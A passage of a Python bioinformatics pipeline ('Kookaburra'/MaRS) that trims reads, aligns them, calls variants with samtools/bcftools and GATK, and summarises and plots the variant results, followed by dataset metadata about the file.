main_logger.debug('BBDuk completed')\n\n if aligner == 'bwa':\n #Call BWA\n main_logger.debug('Running BWA')\n if os.path.exists('{0}/align.rt'.format(completion_path)):\n sam_path = '{0}/alignments/output.sam'.format(out_path)\n mret = 0\n main_logger.debug('Skipping BWA')\n else:\n bwa = Bwa(alinger_path, out_path, ref_path)\n sam_path, mret = bwa.bwamem(rone_path, rtwo_path)\n if mret == 0:\n Path('{0}/align.rt'.format(completion_path)).touch()\n if mret != 0:\n raise RuntimeError('Bwa mem failed to complete; Exiting MARs')\n else:\n main_logger.debug('BWA completed')\n\n elif aligner == 'bowtie2':\n #Call Bowtie2\n main_logger.debug('Running Bowtie2')\n if os.path.exists('{0}/aling.rt'.format(completion_path)):\n sam_path = '{0}/alignments/output.sam'.format(out_path)\n mret = 0\n main_logger.debug('Skipping Bowtie2')\n else:\n bowtie = Bowtie(alinger_path, out_path, ref_path)\n sam_path, mret = bowtie.bowtie(rone_path, rtwo_path)\n if mret == 0:\n Path('{0}/align.rt'.format(completion_path)).touch()\n if mret != 0:\n raise RuntimeError('Bowtie2 failed to complete; Exiting MARs')\n else:\n main_logger.debug('Bowtie2 completed')\n\n elif aligner == 'snap':\n #Call Snap\n main_logger.debug('Running Snap')\n snap = Snap(alinger_path, out_path, ref_path)\n sam_path, mret = snap.snap(rone_path, rtwo_path)\n if mret != 0:\n raise RuntimeError('Snap failed to complete; Exiting MARs')\n else:\n main_logger.debug('Snap completed')\n\n elif aligner == 'bbmap':\n #Call Bbmap\n main_logger.debug('Running BBMap')\n if os.path.exists('{0}/aling.rt'.format(completion_path)):\n sam_path = '{0}/alignments/output.sam'.format(out_path)\n mret = 0\n else:\n bbmap = BBMap(alinger_path, out_path, ref_path)\n sam_path, mret = bbmap.bbmap(rone_path, rtwo_path)\n if mret == 0:\n Path('{0}/align.rt'.format(completion_path)).touch()\n if mret != 0:\n raise RuntimeError('BBMap failed to complete; Exitinign MARs')\n else:\n main_logger.debug('BBMap completed')\n\n\n #Fix mate information, sort files and add read groups\n varengine = Samtools(smt_path, bft_path, out_path)\n if os.path.exists('{0}/fixmate.rt'.format(completion_path)):\n base = os.path.splitext(os.path.basename(sam_path))[0]\n bam_path = '{0}/{1}_fixmate.bam'.format(out_path, base)\n fret = 0\n main_logger.debug('Skipping fixmate')\n else:\n bam_path, fret = varengine.fixmate(sam_path)\n if fret == 0:\n Path('{0}/fixmate.rt'.format(completion_path)).touch()\n main_logger.debug('Running Samtools fixmate')\n if fret != 0:\n raise RuntimeError('Samtools fixmate failed to complete; Exiting MARs')\n else:\n main_logger.debug('Samtools fixmate completed')\n\n if os.path.exists('{0}/sort.rt'.format(completion_path)):\n base = os.path.splitext(os.path.basename(bam_path))[0]\n bam_path = '{0}/{1}_sorted.bam'.format(out_path, base)\n sret = 0\n main_logger.debug('Skipping sort')\n else:\n bam_path, sret = varengine.sort(bam_path)\n if sret == 0:\n Path('{0}/sort.rt'.format(completion_path)).touch()\n main_logger.debug('Running Samtools sort')\n if sret != 0:\n raise RuntimeError('Samtools sort failed to complete; Exiting MARs')\n else:\n main_logger.debug('Samtools sort completed')\n\n rgadder = Picard(java_path, pic_path, out_path)\n if os.path.exists('{0}/readgroup.rt'.format(completion_path)):\n base = os.path.splitext(os.path.basename(bam_path))[0]\n bam_path = '{0}/{1}_RG.bam'.format(out_path, base)\n aret = 0\n main_logger.debug('Skipping add read group')\n else:\n bam_path, aret = rgadder.picard(bam_path, sam_name)\n main_logger.debug('Running Picard AddOrReplaceReadGroups')\n if aret == 0:\n Path('{0}/readgroup.rt'.format(completion_path)).touch()\n if aret != 0:\n raise RuntimeError('Picard AddOrReplaceReadGroups failed to complete; Exiting MARs')\n else:\n main_logger.debug('Picard AddOrReplaceReadGroups completed')\n\n #Run samtools mpileup, bcftools index, call and stats to generate VCF files\n if os.path.exists('{0}/pileup.rt'.format(completion_path)):\n bcf_path = '{0}/variants.bcf'.format(out_path)\n pret = 0\n main_logger.debug('Skipping Pileup')\n else:\n bcf_path, pret = varengine.pileup(ref_path, bam_path)\n main_logger.debug('Running Samtools mpileup')\n if pret == 0:\n Path('{0}/pileup.rt'.format(completion_path)).touch()\n if pret != 0:\n raise RuntimeError('Samtools mpileup failed to complete; Exiting MARs')\n else:\n main_logger.debug('Samtools mpileup completed')\n\n if os.path.exists('{0}/bcfindex.rt'.format(completion_path)):\n bret = 0\n main_logger.debug('Skipping Bcfindex')\n else:\n bret = varengine.bcfindex(bcf_path)\n main_logger.debug('Running Bcftools index')\n if bret ==0 :\n Path('{0}/bcfindex.rt'.format(completion_path)).touch()\n if bret != 0:\n raise RuntimeError('Bcftools index failed to complete; Exiting MARs')\n else:\n main_logger.debug('Bcftools index completed')\n\n if os.path.exists('{0}/bcfcall.rt'.format(completion_path)):\n vcf_path = '{0}/{1}_variants.vcf'.format(out_path, sam_name)\n bret = 0\n main_logger.debug('Skipping bcfcall')\n else:\n vcf_path, bret = varengine.bcftools(bcf_path, bed_path, sam_name)\n main_logger.debug('Running Bcftools call')\n if bret == 0:\n Path('{0}/bcfcall.rt'.format(completion_path)).touch()\n\n if bret != 0:\n raise RuntimeError('Bcftools call failed to complete; Exiting MARs')\n else:\n main_logger.debug('Bcftools call completed')\n\n #if os.path.exists('{0}/stats.rt'.format())\n #stats_path, bret = varengine.bcfstats(vcf_path, ref_path)\n #main_logger.debug('Running Bcftools stats')\n #if bret != 0:\n # raise RuntimeError('Bcftools stats failed to complete; Exiting MARs')\n #else:\n # main_logger.debug('Bcftools stats completed')\n\n #Call GATK HaplotypeCaller to generate VCF files\n varcaller = GenAnTK(gatk_path, out_path, java_path)\n main_logger.debug('Running GATK HaplotypeCaller')\n if os.path.exists('{0}/gatk.rt'.format(completion_path)):\n gvcf_path = '{0}/{1}_variants_gatk.vcf'.format(out_path, sam_name)\n gret = 0\n main_logger.debug('Skipping GATK')\n else:\n gvcf_path, gret = varcaller.hapCaller(bam_path, ref_path, sam_name)\n if gret == 0:\n Path('{0}/gatk.rt'.format(completion_path)).touch()\n if gret != 0:\n raise RuntimeError('GATK HaplotypeCaller failed to complete; Exiting MARs')\n else:\n main_logger.debug('GATK HaplotypeCaller stats completed')\n\n #Call Kestrel to generate VCF files\n #kestrel_path = 'lib/kestrel/kestrel.jar'\n #kanalyze_path = 'lib/kestrel/kanalyze.jar'\n #varcaller = KestrelVar(rone_path, rtwo_path, ref_path, kanalyze_path,\n # kestrel_path, out_path)\n #varcaller = GenAnTK(gatk_path, out_path, java_path)\n #main_logger.debug('Running Kestrel')\n #if os.path.exists('{0}/kestrel.rt'.format(completion_path)):\n # kvcf_path = '{0}/vairants_kes.vcf'.format(out_path)\n # kret = 0\n # main_logger.debug('Skipping Kestrel')\n #else:\n # kvcf_path, kret = varcaller.run_kestrel()\n # if kret == 0:\n # Path('{0}/kestrel.rt'.format(completion_path)).touch()\n #if kret != 0:\n # raise RuntimeError('Kestrel failed to complete; Exiting MARs')\n #else:\n # main_logger.debug('Kestrel stats completed')\n\n #Filer and annotate variant calls\n main_logger.debug('Annotating variants')\n annotate = Vcf.Annotate()\n gvcf_path = annotate.getAnnotation(bed_path, gvcf_path, ref_path, out_path)\n vcf_path = annotate.getAnnotation(bed_path, vcf_path, ref_path, out_path)\n main_logger.debug('Filetering low quality variants and merging GATK and Samtools calls')\n gvcf_file = Vcf.Reader(gvcf_path)\n svcf_file = Vcf.Reader(vcf_path)\n merge_vcf = Vcf.Merge(gvcf_file, svcf_file)\n merged_vcf = merge_vcf.merge(out_path)\n# merged_vcf = annotate.iterVcf(bed_path, merged_vcf, sam_name, ref_path, 'merged'7)\n# gatk_vcf = annotate.iterVcf(bed_path, gvcf_path, sam_name, ref_path, 'gatk')\n# samtools_vcf = annotate.iterVcf(bed_path, vcf_path , sam_name, ref_path, 'samtools')\n summary = Summary(ref_path, bed_path, voi_path, out_dir)\n var_sum = summary.getVarStats(merged_vcf)\n main_logger.info('Total variants : {0}; Verified calls : {1}; Exonic : {2}; Intronic : {3}; Synonymous : {4}; Non Synonymous : {5}; Transition : {6}; Transversion : {7}'.format(\n var_sum[0], var_sum[1], var_sum[2], var_sum[3], var_sum[4], var_sum[5], var_sum[6], var_sum[7]))\n return(merged_vcf, 0)\n\ndef marsBatch(bbduk_path, aligner_path, smt_path, bft_path, gatk_path,\n inp_path, ref_path, adp_path, bed_path, out_dir, aligner,\n pic_path, voi_path, java_path, sra_path):\n #Creating logger for pyamd\n logger = logging.getLogger('Kookaburra')\n logger.setLevel(logging.DEBUG)\n #Create output paths for the run\n if not os.path.exists(os.path.abspath(out_dir)):\n os.mkdir(os.path.abspath(out_dir))\n # Creating a file handler which logs even debug messages\n fh = logging.FileHandler('{0}/kookaburra.log'.format(os.path.abspath(out_dir)))\n fh.setLevel(logging.DEBUG)\n # Creating a console handler to log info messages\n ch = logging.StreamHandler()\n ch.setLevel(logging.INFO)\n # Create formatter and add it to the handlers\n formatter = logging.Formatter('{asctime} - {name} - {levelname} - {message}', style=\"{\")\n fh.setFormatter(formatter)\n ch.setFormatter(formatter)\n # Add the handlers to the logger\n logger.addHandler(fh)\n logger.addHandler(ch)\n #Create file and console handlers for MaRS\n logger.info('Gathering input information from input path.')\n prep = Prepper(inp_path, sra_path)\n config = prep.prepInputs()\n logger.info('Running MaRS on {0} experiments'.format(len(config)))\n #summary = Summary(ref_path, bed_path, voi_path, out_dir)\n samples = config.keys()\n pools = Pool(4)\n rone_list = list()\n rtwo_list = list()\n name_list = list()\n for samples in config:\n name_list.append(config[samples].sample)\n rone_list.append(config[samples].files[0])\n rtwo_list.append(config[samples].files[1])\n\n\n vcf_list = pools.map(main, zip(repeat(bbduk_path), repeat(aligner_path),\n repeat(smt_path), repeat(bft_path), repeat(gatk_path),\n rone_list, rtwo_list, repeat(ref_path), repeat(adp_path),\n repeat(bed_path), repeat(out_dir), repeat(aligner),\n repeat(pic_path), name_list, repeat(voi_path),\n repeat(java_path)))\n\n logger.info('Summarizing variant calls from all {0} experiments'.format(len(config)))\n summary = Summary(ref_path, bed_path, voi_path, out_dir)\n #Sumarize variants of intrest\n exp_voi = summary.getRepSnps()\n exp_voi = summary.getDepthStats(exp_voi)\n exp_voi = exp_voi.reset_index(level=1)\n #exp_voi.drop_duplicates(subset='Variant', inplace=True)\n exp_voi[['Gene_name', 'RefAA_sym', 'AAPos_sort', 'AltAA_sym']] = exp_voi['Variant'].str.extract('(?P[a-zA-Z0-9]+):(?P[a-zA-Z]?)(?P[0-9]+)(?P[a-zA-Z]?)', expand=True)\n exp_voi['Sample_name'] = exp_voi.index\n exp_voi['AAPos_sort'] = pd.to_numeric(exp_voi['AAPos_sort'])\n exp_voi.sort_values(['Sample_name', 'Gene_name', 'AAPos_sort'], inplace=True)\n exp_voi.drop(labels=['Sample_name', 'Gene_name', 'RefAA_sym', 'AAPos_sort',\n 'AltAA_sym','Sample'], axis=1, inplace=True)\n exp_voi.to_csv('{0}/Study_variants.csv'.format(out_dir))\n\n exp_af = exp_voi.pivot(exp_voi.index, 'Variant')['AF'].transpose()\n exp_af['Variant'] = exp_af.index\n exp_af[['Gene_name', 'RefAA_sym', 'AAPos_sort', 'AltAA_sym']] = exp_af['Variant'].str.extract('(?P[a-zA-Z0-9]+):(?P[a-zA-Z]?)(?P[0-9]+)(?P[a-zA-Z]?)', expand=True)\n exp_af['AAPos_sort'] = pd.to_numeric(exp_af['AAPos_sort'])\n exp_af.sort_values(['Gene_name', 'AAPos_sort'], inplace=True)\n exp_af.drop(labels=['Variant', 'Gene_name', 'RefAA_sym', 'AAPos_sort',\n 'AltAA_sym'], axis=1, inplace=True)\n af_mask = exp_af.isnull()\n exp_af.to_csv('{0}/Study_reportable_variants_allele_frequency.csv'.format(out_dir))\n# summary.plotHeatMap(exp_af, 'voi_af', af_mask)\n exp_dp = exp_voi.pivot(exp_voi.index, 'Variant')['DP'].transpose()\n exp_dp['Variant'] = exp_dp.index\n exp_dp[['Gene_name', 'RefAA_sym', 'AAPos_sort', 'AltAA_sym']] = exp_dp['Variant'].str.extract('(?P[a-zA-Z0-9]+):(?P[a-zA-Z]?)(?P[0-9]+)(?P[a-zA-Z]?)', expand=True)\n exp_dp['AAPos_sort'] = pd.to_numeric(exp_dp['AAPos_sort'])\n exp_dp.sort_values(['Gene_name', 'AAPos_sort'], inplace=True)\n exp_dp.drop(labels=['Variant', 'Gene_name', 'RefAA_sym', 'AAPos_sort',\n 'AltAA_sym'], axis=1, inplace=True)\n dp_mask = exp_dp.isnull()\n exp_dp.to_csv('{0}/Study_reportable_variants_depth.csv'.format(out_dir))\n# summary.plotHeatMap(exp_dp, 'voi_dp', dp_mask)\n# summary.plotCountPlot(exp_af, 'voi')\n #Summarize novel variants\n exp_nov = summary.getNovSnps()\n exp_nov = summary.getNovDepthStats(exp_nov)\n exp_nov = exp_nov.reset_index(level=1)\n exp_nov[['Gene_name', 'RefAA_sym', 'AAPos_sort', 'AltAA_sym']] = exp_nov['Variant'].str.extract('(?P[a-zA-Z0-9]+):(?P[a-zA-Z]?)(?P[0-9]+)(?P[a-zA-Z]?)', expand=True)\n exp_nov['Sample_name'] = exp_nov.index\n exp_nov['AAPos_sort'] = pd.to_numeric(exp_nov['AAPos_sort'])\n exp_nov.sort_values(['Sample_name', 'Gene_name', 'AAPos_sort'], inplace=True)\n exp_nov.drop(labels=['Sample_name', 'Gene_name', 'RefAA_sym', 'AAPos_sort',\n 'AltAA_sym', 'Sample'], axis=1, inplace=True)\n exp_nov.to_csv('{0}/Study_novel_exonic_variants.csv'.format(out_dir))\n #Separate and capture Intron and exonic variants\n exp_nov_af = exp_nov.loc[:,['Variant', 'AF']]\n exp_nov_af[['Gene_name', 'RefAA_sym', 'AAPos_sort', 'AltAA_sym']] = exp_nov_af['Variant'].str.extract('(?P[a-zA-Z0-9]+):(?P[a-zA-Z]?)(?P[0-9]+)(?P[a-zA-Z]?)', expand=True)\n exp_nov_af['AAPos_sort'] = pd.to_numeric(exp_nov_af['AAPos_sort'])\n exp_nov_af.sort_values(['Gene_name', 'AAPos_sort'], inplace=True)\n exp_nov_af.drop(labels=['Variant', 'Gene_name', 'RefAA_sym', 'AAPos_sort',\n 'AltAA_sym'], axis=1, inplace=True)\n exp_nov_af.to_csv('{0}/Study_novel_variants_alele_frequency.csv'.format(out_dir))\n exp_nov_dp = exp_nov.loc[:,['Variant', 'DP']]\n exp_nov_dp['Variant'] = exp_nov_dp.index\n exp_nov_dp[['Gene_name', 'RefAA_sym', 'AAPos_sort', 'AltAA_sym']] = exp_nov_dp['Variant'].str.extract('(?P[a-zA-Z0-9]+):(?P[a-zA-Z]?)(?P[0-9]+)(?P[a-zA-Z]?)', expand=True)\n exp_nov_dp['AAPos_sort'] = pd.to_numeric(exp_nov_dp['AAPos_sort'])\n exp_nov_dp.sort_values(['Gene_name', 'AAPos_sort'], inplace=True)\n exp_nov_dp.drop(labels=['Variant', 'Gene_name', 'RefAA_sym', 'AAPos_sort',\n 'AltAA_sym'], axis=1, inplace=True)\n exp_nov_dp.to_csv('{0}/Study_novel_variants_depth.csv'.format(out_dir))\n exp_intron = summary.getIntronTables()\n exp_intron = exp_intron.reset_index()\n\n #print(exp_intron.index)\n #exp_intron.reset_index(level=1)\n# print(exp_intron.head())\n exp_intron[['Gene_name', 'RefAA_sym', 'AAPos_sort', 'AltAA_sym']] = exp_intron['Variant'].str.extract('(?P[a-zA-Z0-9]+):(?P[a-zA-Z]?)(?P[0-9]+)(?P[a-zA-Z]?)', expand=True)\n #exp_intron['']\n exp_intron['AAPos_sort'] = pd.to_numeric(exp_intron['AAPos_sort'])\n exp_intron.sort_values(['Sample', 'Gene_name', 'AAPos_sort'], inplace=True)\n exp_intron.drop(labels=['Gene_name', 'RefAA_sym', 'AAPos_sort',\n 'AltAA_sym' ], axis=1, inplace=True)\n exp_intron.sort_index().reset_index(drop=True).to_csv('{0}/Study_novel_intronic_variants.csv'.format(out_dir), index=False)\n # Plot using Rscript\n logger.info('Plotting Depth Per SNP')\n dcmd = ['Rscript', 'pyamd/Rscripts/DepthPerReportSNP.R', '-i',\n '{0}/Study_reportable_variants_depth.csv'.format(out_dir), '-o',\n '{0}/Study_depth.pdf'.format(out_dir)]\n drun = subprocess.Popen(dcmd, shell=False,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n drun.wait()\n if drun.returncode != 0:\n logger.error('Failed to execute DepthPerReportSNP.R')\n logger.error(' '.join(dcmd))\n\n logger.info('Plotting Reportable SNPs Frequency')\n acmd = ['Rscript', 'pyamd/Rscripts/reportableSNPsFreq.R', '-i',\n 'Study_variants.csv'.format(out_dir), '-r',\n 'ref/Reportable_SNPs.csv', '-o', '{0}/'.format(out_dir)]\n arun = subprocess.Popen(acmd, shell=False,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n arun.wait()\n if arun.returncode != 0:\n logger.error('Failed to execute reportableSNPsFreq.R')\n logger.error(' '.join(acmd))\n logger.info('Plotting Novel Exonic Non-Synonymous SNPs')\n nenscmd = ['Rscript', 'pyamd/Rscripts/NovelExonicNonSynSNPs.R', '-i',\n 'Study_novel_exonic_variants.csv'.format(out_dir),\n '-o', '{0}/'.format(out_dir)]\n nensrun = subprocess.Popen(nenscmd, shell=False,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n nensrun.wait()\n if nensrun.returncode != 0:\n logger.error('Failed to execute NovelExonicNonSynSNPs.R')\n logger.error(' '.join(nenscmd))\n\n logger.info('Plotting Novel Exonic Synonymous SNPs')\n nescmd = ['Rscript', 'pyamd/Rscripts/NovelExonicSynSNPs.R', '-i',\n 'Study_novel_exonic_variants.csv'.format(out_dir),\n '-o', '{0}/'.format(out_dir)]\n nesrun = subprocess.Popen(nescmd, shell=False,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n nesrun.wait()\n if nesrun.returncode != 0:\n logger.error('Failed to execute NovelExonicSynSNPs.R')\n logger.error(' '.join(acmd))\n\n logger.info('Plotting Novel Intronic SNPs')\n nicmd = ['Rscript', 'pyamd/Rscripts/NovelIntronicSNPs.R', '-i',\n 'Study_novel_intronic_variants.csv'.format(out_dir),\n '-o', '{0}/'.format(out_dir)]\n nirun = subprocess.Popen(nicmd, shell=False,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n nirun.wait()\n if nirun.returncode != 0:\n logger.error('Failed to execute NovelIntronicSNPs.R')\n logger.error(' '.join(nicmd))\n\n #os.remove('{0}/Reportable_SNPs_Report.csv'.format(out_dir))\n os.remove('{0}/novel_SNPs_exonic_syn.csv'.format(out_dir))\n os.remove('{0}/novel_SNPs_intronic.csv'.format(out_dir))\n os.remove('{0}/novel_SNPs_exonic_nonsyn.csv'.format(out_dir))\n os.remove('{0}/Study_novel_exonic_variants_filtered.csv'.format(out_dir))\n os.remove('{0}/Study_novel_intronic_variants_filtered.csv'.format(out_dir))\n return(0)\n\nif __name__ == '__main__':\n #Define deffault paths and aligner informations\n def_path = \"{0}/lib\".format(os.path.abspath(os.path.dirname(os.path.realpath(__file__))))\n ref_def_path = \"{0}/ref\".format(os.path.abspath(os.path.dirname(os.path.realpath(__file__))))\n bbduk_def = 'bbduk.sh' #\"{0}/bbmap/bbduk.sh\".format(def_path)\n bbmap_def = 'bbmap.sh' #\"{0}/bbmap/bbmap.sh\".format(def_path)\n bwa_def = 'bwa' #\"{0}/bwa/bwa\".format(def_path)\n bowtie_def = 'bowtie2' #\"{0}/bowtie2/bowtie2\".format(def_path)\n snap_def = 'snap-alinger' #\"{0}/snap/snap-aligner\".format(def_path)\n smt_def = 'samtools' #\"{0}/samtools/samtools\".format(def_path)\n bft_def = 'bcftools' #\"{0}/bcftools/bcftools\".format(def_path)\n gatk_def = 'gatk' #\"{0}/GenomeAnalysisTK.jar\".format(def_path)\n pic_def = 'picard' #\"{0}/picard.jar\".format(def_path)\n sra_def = 'fastq-dump' #'{0}/sratoolkit/bin/fastq-dump'.format(def_path)\n voi_def = '{0}/Reportable_SNPs.csv'.format(ref_def_path)\n #if 'java version \"1.8.' in str(subprocess.check_output([\"java\", \"-version\"], stderr=subprocess.STDOUT).decode('UTF-8').split('\\n')[0]):\n java_def = 'java'\n #else:\n # java_def = \"{0}/jdk/bin/java\".format(def_path)\n aligner_def = {'bwa' : bwa_def, 'snap' : snap_def, 'bowtie2': bowtie_def, 'bbmap': bbmap_def}\n #Get arguments\n parser = argparse.ArgumentParser(prog='kookaburra')\n parser.add_argument('-i', '--inp_path', type=str,\n help='Path to input directory (Specify only for batch mode)')\n parser.add_argument('-1', '--fwd', dest='rone_path', type=str,\n help='Path to forward reads fastq', )\n parser.add_argument('-2', '--rev', dest='rtwo_path', type=str,\n help='Path to reverse reads fastq')\n parser.add_argument('-r', '--ref', dest='ref_path', type=str,\n help='Path to Reference fasta file', required=True)\n parser.add_argument('-a', '--adapter', dest='adp_path', type=str,\n help='Path to Adpater fasta file', required=True)\n parser.add_argument('-b', '--bed', dest='bed_path', type=str,\n help='Path to Bed file for MDR regions', required=True)\n parser.add_argument('-o', '--outpath', dest='out_path', type=str,\n help='Path where all outputs will be stored', required=True)\n parser.add_argument('-n', '--sam_name', dest='sam_name', type=str,\n help='Sample name', default=None)\n parser.add_argument('-m', '--mapper', dest='aligner', type=str,\n choices=['bowtie2', 'bwa', 'bbmap', 'snap'],\n default='bwa', help='The aligner to used by MARs')\n parser.add_argument('--bbduk', dest='bbduk_path', type=str, default=bbduk_def,\n help='Path to BBduk executable')\n parser.add_argument('--aligner', dest='aligner_path', type=str, default=None,\n help='Path to aligner executable')\n parser.add_argument('--samtools', dest='smt_path', type=str, default=smt_def,\n help='Path to Samtools executable')\n parser.add_argument('--gatk', dest='gatk_path', type=str, default=gatk_def,\n help='Path to GATK executable')\n parser.add_argument('--bcftools', dest='bft_path', type=str, default=bft_def,\n help='Path to Bcftools executable')\n parser.add_argument('--picard', dest='pic_path', type=str, default=pic_def,\n help='Path to Bcftools executable')\n parser.add_argument('--varofint', dest='voi_path', type=str, default=voi_def,\n help='Path to variant of interest')\n args = parser.parse_args()\n\n #Validate parsed arguments\n if args.aligner_path is None:\n args.aligner_path = aligner_def[args.aligner]\n\n if not os.path.exists(args.out_path):\n os.mkdir(args.out_path)\n\n #Check if the run command is for batch mode analysis or single sample\n #analysis.\n #If inp_path is empty and rone_path is not, then the experiment is a\n #single sample experiment.\n status = marsBatch(args.bbduk_path, args.aligner_path, args.smt_path,\n args.bft_path, args.gatk_path, args.inp_path, args.ref_path,\n args.adp_path, args.bed_path, args.out_path, args.aligner,\n args.pic_path, args.voi_path, java_def, sra_def)\n", "sub_path": "pyamd.py", "file_name": "pyamd.py", "file_ext": "py", "file_size_in_byte": 27458, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path", "line_number": 54, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path", "line_number": 75, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 87, "usage_type": "call"}, {"api_name": "pyamd.bbduk.QualCheck", "line_number": 93, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path", "line_number": 105, "usage_type": "attribute"}, {"api_name": "pyamd.alignment.Bwa", "line_number": 110, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 122, "usage_type": "call"}, {"api_name": "os.path", "line_number": 122, "usage_type": "attribute"}, {"api_name": "pyamd.alignment.Bowtie", "line_number": 127, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 130, "usage_type": "call"}, {"api_name": "pyamd.alignment.Snap", "line_number": 139, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 149, "usage_type": "call"}, {"api_name": "os.path", "line_number": 149, "usage_type": "attribute"}, {"api_name": "pyamd.alignment.BBMap", "line_number": 153, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 156, "usage_type": "call"}, {"api_name": "pyamd.samtools.Samtools", "line_number": 164, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 165, "usage_type": "call"}, {"api_name": "os.path", "line_number": 165, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 166, "usage_type": "call"}, {"api_name": "os.path", "line_number": 166, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 166, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 173, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 180, "usage_type": "call"}, {"api_name": "os.path", "line_number": 180, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 181, "usage_type": "call"}, {"api_name": "os.path", "line_number": 181, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 181, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 188, "usage_type": "call"}, {"api_name": "pyamd.gatk.Picard", "line_number": 195, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 196, "usage_type": "call"}, {"api_name": "os.path", "line_number": 196, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 197, "usage_type": "call"}, {"api_name": "os.path", "line_number": 197, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 197, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 205, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 212, "usage_type": "call"}, {"api_name": "os.path", "line_number": 212, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 220, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 226, "usage_type": "call"}, {"api_name": "os.path", "line_number": 226, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 233, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 239, "usage_type": "call"}, {"api_name": "os.path", "line_number": 239, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 247, "usage_type": "call"}, {"api_name": "pyamd.gatk.GenAnTK", "line_number": 263, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 265, "usage_type": "call"}, {"api_name": "os.path", "line_number": 265, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 272, "usage_type": "call"}, {"api_name": "pyamd.parsers.vcf.Vcf.Annotate", "line_number": 300, "usage_type": "call"}, {"api_name": "pyamd.parsers.vcf.Vcf", "line_number": 300, "usage_type": "name"}, {"api_name": "pyamd.parsers.vcf.Vcf.Reader", "line_number": 304, "usage_type": "call"}, {"api_name": "pyamd.parsers.vcf.Vcf", "line_number": 304, "usage_type": "name"}, {"api_name": "pyamd.parsers.vcf.Vcf.Reader", "line_number": 305, "usage_type": "call"}, {"api_name": "pyamd.parsers.vcf.Vcf", "line_number": 305, "usage_type": "name"}, {"api_name": "pyamd.parsers.vcf.Vcf.Merge", "line_number": 306, "usage_type": "call"}, {"api_name": "pyamd.parsers.vcf.Vcf", "line_number": 306, "usage_type": "name"}, {"api_name": "pyamd.summarize.Summary", "line_number": 311, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 321, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 322, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 324, "usage_type": "call"}, {"api_name": "os.path", "line_number": 324, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 324, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 325, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 325, "usage_type": "call"}, {"api_name": "os.path", "line_number": 325, "usage_type": "attribute"}, {"api_name": "logging.FileHandler", "line_number": 327, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 327, "usage_type": "call"}, {"api_name": "os.path", "line_number": 327, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 328, 